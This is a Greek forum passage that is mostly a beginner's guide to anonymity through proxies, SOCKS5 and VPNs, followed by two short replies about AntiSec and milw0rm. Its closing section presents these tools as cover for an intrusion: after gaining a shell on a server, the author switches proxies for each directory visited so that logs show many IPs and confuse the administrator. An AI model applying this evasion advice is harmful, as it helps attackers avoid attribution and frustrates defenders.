server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client's request or the server's response, and sometimes it may serve the request without contacting the specified server. In this case, it 'caches' responses from the remote server, and returns subsequent requests for the same content directly. Δηλαδή με λίγα λόγια είναι ένας υπολογιστής , ο οποίος παρεμβάλλεται μεταξύ του δικού μας , και του remote που είμαστε κάθε φορά.Ένας διαμεσολαβητής , από τον οποίο περνάνε τα request του δικού μας πριν φθάσουν στον στόχο!Οι proxy server , χρησιμοποιούνται κατά το μεγαλύτερο βαθμό στην εποχή μας , καθώς επιτελούν και άλλες δουλιές , εξίσου σημαντικές για τους χρήστες! Προκειμένου να χρησιμοποιήσουμε έναν proxy , μπορούμε να βρούμε online υπηρεσίες , οι οποίες παρέχουν ανωνυμία όπως για παράδειγμα το http://www.proxylayer.com/ , καθώς και και πολλές άλλες , οι οποίες μπορούν να βρεθούν με μια αναζήτηση του τύπου : "online proxy websites"!Εδώ ,(http://www.prospector.cz/Free-Internet-services/Web-proxy/), μπορείτε να δείτε online proxy υπηρεσίες.Αν τώρα , θέλουμε , να σερφάρουμε με proxy , όλη την ώρα που βρισκόμαστε στο διαδίκτυο , μπορεί πολύ απλά να γίνει με ρύθμιση του browser!Δηλαδή , στον firefox , ας πούμε καθώς χρησιμοποιείται από την πλειονότητα οι ρυθμίσεις που μπορούν να γίνουν είναι οι εξής: Τι είναι τα SOCKS(5)? Απόσπασμα από wikipedia: SOCKS is an Internet protocol that facilitates the routing of network packets between client–server applications via a proxy server. SOCKS performs at Layer 5 of the OSI model—the session layer (an intermediate layer between the presentation layer and the transport layer). Port 1080 is the registered port designated for the SOCKS server. The SOCKS5 protocol was originally a security protocol that made firewalls and other security products easier to administer. It was approved by the IETF in 1996. The protocol was developed in collaboration with Aventail Corporation, which markets the technology outside of Asia.[1] Tools -> Options -> Advanced -> Network -> Settings ->Manual Proxy Configuration ->Option x .Όπου χ , τι proxy θα χρησιμοποιήσουμε.Αν δλδ , επιλέξουμε SOCKS5 τότε μπορούμε από εδώ , (http://www.xroxy.com/proxy-type-Socks5.htm) , να επιλέξουμε και στην συνέχεια να το αποθηκεύσουμε , σερφάροντας κάθε φορά με τον επιλεγμένο proxy!Aρκετά καλή μέθοδος! Η ίδια λογική , ισχύει και στους υπόλοιπους φυλλομετρητές. Ας δούμε ένα παράδειγμα ,χρησιμοποιώντας κάποιον web proxy!Ας επισκεφθούμε , το google.com μέσω ενός proxy!Έστω , ότι μπαίνουμε από το proxylayer.com : Βλέπουμε λοιπόν , ότι πλέον βρισκόμαστε σε αλλαγμένη τοποθεσία , με λίγα λόγια είμαστε πλέον ανώνυμοι!Τo γεγονός λοιπόν , ότι είμαστε ανώνυμοι , μας δίνει δυνατότητες , καθώς ,μπορούμε να κάνουμε δοκιμές χωρίς να υπάρχει ο φόβος εντοπισμού της τοποθεσίας μας!Φυσικά , αν γίνει trace η ip , θα βρεθεί απλά η fake τοποθεσία , κάτι που δεν μας ενδιαφέρει καθόλου!Η τοποθεσία , μάλιστα μπορεί να μην υπάρχει και καθόλου , καθώς αυτή είναι η δουλειά των proxy , να δίνουν fake τοποθεσίες ή και απλά ανύπαρκτες!Tώρα , υπάρχουν και κίνδυνοι χρησιμοποιώντας ένα proxy server καθώς τα δεδομένα που περνάνε από τον διαμεσολαβήτη , δεν αποκρυπτογραφούνται και παραμονεύει ο κίνδυνος για sniffing!Δηλαδή να πέσουμε θύματα χωρίς να το έχουμε καταλάβει! Μικρό-Απόσπασμα από wikipedia: In using a proxy server (for example, anonymizing HTTP proxy), all data sent to the service being used (for example, HTTP server in a website) must pass through the proxy server before being sent to the service, mostly in unencrypted form. It is therefore a feasible risk that a malicious proxy server may record everything sent: including unencrypted logins and passwords. Ωστόσο , αυτό όταν χρησιμοποιούμε τον proxy για κάποια δοκιμή ασφάλειας κάποιας ιστοσελίδας ,δεν μας ενδιαφέρει αφού δεν πρόκειται να δώσουμε κάποιο password δικό μας , δηλαδή δεν δίνουμε στοιχεία , αφου προφανώς δεν χρειάζονται! Έτσι λοιπόν , ένας τρόπος ανωνυμίας , είναι η χρήση ενός proxy server , επιπλέον χρησιμοποιούνται από την πλειοψηφία , κάτι φυσικά που δεν μας ενδιαφέρει. Ας δούμε και λίγο καλύτερα την ανωνυμία.Θα επισκεφθούμε το http://www.facebook.com , χωρίς proxy , θα δούμε την ανάλυση της σύνδεσης , και μετά με proxy και θα τα συγκρίνουμε! Aς μπούμε χωρίς proxy: Βλέπουμε στην ανάλυση του etherape , ποιες συνδέσεις γίνονται και φυσικά βλέπουμε το facebook , κάτι το οποίο είναι λογικό αφού γίνεται direct connection! Μέσα από proxy.. Κανένα ίχνος σύνδεσης με το facebook , όλα τα δεδομένα περνάνε μέσα από proxy!Τρομερό ε? 2) Ανωνυμία μέσω VPN(Virtual Private Network) Aπόσπασμα από wikipedia: A virtual private network (VPN) is a network that uses a public telecommunication infrastructure, such as the Internet, to provide remote offices or individual users with secure access to their organization's network. It aims to avoid an expensive system of owned or leased lines that can be used by only one organization. The goal of a VPN is to provide the organization with the same secure capabilities but at a much lower cost. It encapsulates data transfers between two or more networked devices not on the same private network so as to keep the transferred data private from other devices on one or more intervening local or wide area networks. There are many different classifications, implementations, and uses for VPNs. To VPN σε αντίθεση με τους proxy είναι καλύτερο , καθώς στα δεδομένα υπάρχει μεγαλύτερη ασφάλεια ( αν και ήδη είπαμε ότι αυτό δεν μας ενδιαφέρει that much!) , το request που κάνει είναι διαφορετικό οπότε αυτομάτως δίνει πρόσβαση με αλλαγμένη τοποθεσία , και σε ιστοσελίδες στις οποίες οι proxy απλά δεν "περνούν"!Επιπλέον , το VPN είναι πολύ πιο επιθυμητό καθώς ξέρουμε πως τους proxy τους έχουν ήδη σπάσει! Αυτό σημαίνει , πως υπάρχει η δυνατότητα αντιστροφής της τεχνικής πολύ πιο εύκολα (reversing) , το οποίο σημαίνει ότι μπορούν να φθάσουν στα βήματά μας!Φυσικά , και δεν ισχύει κάτι τέτοιο σε καθημερινή βάση δηλαδή , η χρήση ενός proxy δεν θα μας "προδώσει" , αναλόγως βέβαια , που θα σερφάρουμε και τι θα κάνουμε!Όταν τώρα μιλάμε για υπηρεσίες , μυστικές κατά προτίμηση , αποφέυγουμε , να κάνουμε χρήση proxy γιατί δεν θα πάρει πολύ χρόνο , για να μας εντοπίσουν!Τώρα , αν σερφάρουμε ,στις υπόλοιπες ιστοσελίδες , μπορει φυσικά να γίνει χρήση , δεν σημαίνει ότι θα γίνει trace και θα εντοπιστούμε , τις περισσότερες φορές , είναι ανάλογα με τον ιδιοκτήτη του υπολογιστικού συστήματος!Δεν πρέπει να υποτιμάμε ποτέ τον αντίπαλο!Τώρα , πάλι τις περισσότερες φορές , προτείνουμε την χρήση VPN , καθώς σε ένα εικονικό ιδιωτικό δίκτυο , τα πράγματα δυσκολεύουν για την ... κάθε δίωξη!Ένα , πολύ καλό πρόγραμμα για σύνδεση σε VPN είναι το hotspot shield ( http://hotspotshield.com/ ) , το οποίο παρέχει εξαιρετική ανωνυμία! Και βλέπουμε ότι βρισκόμαστε σε network sharing device , δηλαδή σε ένα hotspot , σε ένα VPN!Η ανωνυμία που παρέχεται είναι εξαιρετική!Στο ίντερνετ μπορείτε να βρείτε πολλά VPN προγράμματα , μην νομίζετε όμως ότι έχουν και πολύ μεγάλη διαφορά , επιπλέον μην δοκιμάζετε κάτι για το οποίο δεν είστε σίγουροι τι κάνει! 3)Ανωνυμία μέσω πολλών proxy! Ένα άλλο κόλπο ανωνυμίας που χρησιμοποιείται είναι το λεγόμενο "multiple" , δηλαδή κλείνοντας και ανοίγοντας διαφορετικούς proxy server κάθε φορά που κάνουμε μια ενέργεια!Στην ουσία χρησιμοποιύμε proxy αλλά κάθε φορά έναν διαφορετικό!Έστω δηλαδή , ότι σηκώνουμε ένα shell και πέρνουμε access στον server ενός x site! Υποθέστε ότι βρισκόμαστε εκεί.. μέσω ενός online proxy , και θέλουμε να μπούμε στο [images] directory!Ας μπούμε! Kαι μπαίνουμε λοιπόν στον φάκελο images με κατά κάποιο τρόπο με ip : Οπότε τι σημαίνει αυτό?Είμαστε λοιπόν μέσα στον images folder στο remote μηχάνημα με ip 69.65.124.28 η οποία μας παραπέμπει σε άλλη τοποθεσία , μακρινή! Η κίνηση αυτή λοιπόν έμεινε στα logs του σερβερ , φυσικά , μαζί με την ip μας!Ας αλλάξουμε directory και πάμε να μπούμε στο downloads! Χωρίς λοιπόν να πατήσουμε τίποτα , κάνουμε copy URL και πάμε να μπούμε από άλλον online proxy!Aπο τον zend2.com είμαστε μέσα στο directory download , και φυσικά στα logs του server ισχύει το εξής! attacker : 69.65.124.28 -> images attacker : 67.159.5.99 -> download Αν δηλαδή το προχωρήσουμε η επίθεση θα είχε τον εξής τύπο! attacker : 1.1.1.1 -> file1 attacker : 1.1.1.2 -> file0 attacker : 1.1.2.2 -> uploads attacker : 1.2.2.2 -> admin attacker : 0.0.0.0 -> root Βλέπετε προς τα που το πάω!Ο διαχειριστής δεν πρόκειται να βγάλει νόημα!Η διαδικασία , είναι κάτι παραπάνω από χρονοβόρα! Καταλαβαίνετε τι έχει να γίνει αν αλλάζουμε ip κάθε φορά που θα μπαίνουμε σε ένα διαφορετικό directory!Θα προκληθεί , πανικός , αφού προφανως ο διαχεριστής να νομίσει ότι οι attackers είναι πολλοί και όχι ένας!Και φυσικά η ίδια τεχνική μπορεί να γίνει αλλαζοντας τα virual private networks(VPN!). Εδώ , λοιπόν , τελιώνει η απεικόνιση ενός οδηγού ανωνυμίας , πιστεύω να είδατε πως δουλεύουμε και πως επιτυγχάνονται ανωνυμίες , καθόσον είναι ένα θέμα που απασχολεί το web , και λέγονται πολλά!Βεβαίως , οι μέθοδοι είναι πολλοί , γενικά όπως ο καθένας μπορεί να χτίσει στο μυαλό του μια καλή τεχνική και να την υλοποιήσει.Το θέμα , που φυσικά παραμένει σκοτεινό είναι αν ποτέ κατορθώσουμε μια πολύ "βαριά" ανωνυμία..Η αλλιώς , πως θα μπορεί να είναι σε rate 100%..! Οποιοδήποτε λάθος , φυσικά το αναφέρετε , για διόρθωση. : -)
  14. dr0pper

    AntiSec : milw0rm και HF

    Βέβαια η εντύπωση κυριαρχεί παλιά και τώρα και όχι μόνον στον εικονικό κόσμο δυστυχώς.Είναι *αποφασισμένοι* πως θα κλείσουν , ότι είναι αυτό το κάτι ,τέλος πάντων....απλά έχουμε βαρεθεί - έχω βαρεθεί- να βλέπω όλο την κα*λα κάποιων, να θέλουν να κάνουν κάτι , πως να το πω , κάτι το οποίο είναι άχρηστο.Μα γιατί να το κλείσεις το κάθε milw0rm και ότι άλλο περί security?Ιδού η απορία.Για πλάκα?Για να εξασκηθείς στις ικανότητές του η μάλλον για να σκάσεις μούρη?Μάλλον για αυτό...........άντε να κάνεις και ένα deface για να χαρείς.Ναι με το λεγόμενο graffiti θα σε μάθει ο κόσμος.......αφού δεν γίνεται αλλιώς..........το ¨μόνο πως θα χαλάσουμε" υπάρχει πια....................και ένα μήνυμα για να προετοιμαστούν οι χρήστες.Πολύ ωραία!
  15. dr0pper

    AntiSec : milw0rm και HF

    Kαι αναρωτιόμουν εδώ και λίγες μέρες "μα τι κάνει αυτό το milw0rm και είναι down?".Xμ, it's like eleos δηλαδή!Πω πω , πολύ terminators είναι......Και τι υποτίθεται ότι τώρα θα θέλουν να terminate το packetstorm η και το redoracle?Λίγο παρανοικό μου φαίνεται.
×